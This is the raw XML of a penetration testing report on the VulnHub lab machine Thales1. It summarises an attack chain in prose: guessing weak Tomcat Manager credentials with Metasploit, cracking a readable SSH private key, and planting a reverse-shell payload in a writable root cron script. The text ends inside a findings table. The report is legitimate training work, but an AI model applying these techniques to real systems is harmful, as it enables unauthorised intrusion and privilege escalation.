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f4761" w:space="10" w:sz="4" w:val="single"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:color="0f4761" w:space="10" w:sz="4" w:val="single"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="360" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="864" w:right="864" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0f4761"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0f4761"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing report for CTF called Thales1 from VulnHub</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05">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06">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07">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08">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09">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0A">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0B">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0C">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0D">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0E">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0F">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10">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11">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12">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13">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14">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15">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16">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17">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18">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19">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20 JULY 2026</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTHOR: SZYMON STEFAŃSKI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CLASSIFICATION: EDUCATIONAL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENVIRONMENT: CONTROLLED ISOLATED LAB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION: 1.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4kb2z7b0sgj4" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement Of Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The contents of this document have been developed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Szymon Stefański</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of the educational path towards penetration tester carrier. This document presents the full process of capturing flags inside of a vulnerable machine called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thales1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">All contents of this document that will be used outside of its legal purposes and educational functions will be considered an illegal activity that the author does not take responsibility for.</w:t>
      </w:r>
    </w:p>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keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="240" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1332413960"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="1"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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4kb2z7b0sgj4">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Statement Of Confidentiality</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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a2i5g6sc7rc">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Executive Summary</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bb2ybkctub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Approach</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rtn8y63767e">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Scope</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u4ohs6x2gr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Assessment Overview and Recommendation</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c5jmvez3ddf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Penetration Test Assessment Summary</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3cxk7n9dv0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of Findings</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epb2cslr7by">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Compromised System Walkthrough</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akq7c13ah5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Detailed Walkthrough</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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hrruodzx2m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Enumeration / information gathering</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6400ebixt0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Exploitation</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ysby0c7w6v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Post-Exploitation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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4gfxvnm2tq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Reproduction of the steps</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5vzxk49yir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Remediation Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">13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y23cpuk3z50">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Mitigation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">13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8fz382r3uj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References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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.xa2i5g6sc7rc" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This document demonstrates the process of capturing two flags inside of a vulnerable machine called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thales1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be downloaded from VulnHub.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nbb2ybkctubt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I performed testing under a „black box” approach on July 20 2026 without any credentials or advance knowledge about source code or the target. Testing was performed using a Kali Linux attack machine inside an isolated host-only network in VirtualBox. The goal was to find the flags inside of the machine through credentials stealing by cracking ssh keys and privilege escalation on a reverse shell. Each weakness identified was documented and written down to further explain my way of thinking and approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qrtn8y63767e" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope of this assessment was one internal network range with two open ports and virtual machine access.</w:t>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5"/>
        <w:gridCol w:w="4511"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4515"/>
            <w:gridCol w:w="4511"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:left w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="18" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Host/URL/IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:left w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="18" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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03D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.239.8</w:t>
            </w:r>
          </w:p>
        </w:tc>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03E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thales1 machine IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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03F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.239.8:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>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040">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat’s page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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041">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.239.8:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:left w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="18" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="18" w:val="single"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH</w:t>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.cu4ohs6x2gr8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Overview and Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During the internal penetration test against Thales1 I managed to find several issues that I categorized and described by severity level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly, I found The Apache Tomcat Manager application ( v9.0.52 ) to be accessible via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">weak administrative credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. While this version of Tomcat does not ship with default credentials in its base configuration, the instance was misconfigured with easily guessable credentials, which I broke using the Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second thing was a weak</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> passphrase and incorrect assignment / permissions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for the SSH private key of user ‘thales’, that I was able to read with a Tomcat service account. Due to this I cracked the encrypted key and found the password for the user account ( I was also able to read the private key file and copy it in the first place ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lastly, after gaining access as an authenticated user named thales, I found in notes.txt sensitive information about a backup.sh file, that was configured to run automatically via cron with root privileges. Normal users had read and write access, which allowed me to inject a payload that created a reverse shell with my Kali Linux machine with full root access – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">full privilege escalation via writable file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.c5jmvez3ddfj" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test Assessment Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During testing I started as an unauthenticated user with no such information as configuration information, source code, files or users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q3cxk7n9dv05" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During the course of testing, I uncovered a total of 3 findings that posed a risk for the system of Thales1. The below table provides a summary of the findings by severity level.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="9026.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000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4513"/>
        <w:gridCol w:w="4513"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4513"/>
            <w:gridCol w:w="4513"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="b6dde8" w:val="clear"/>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
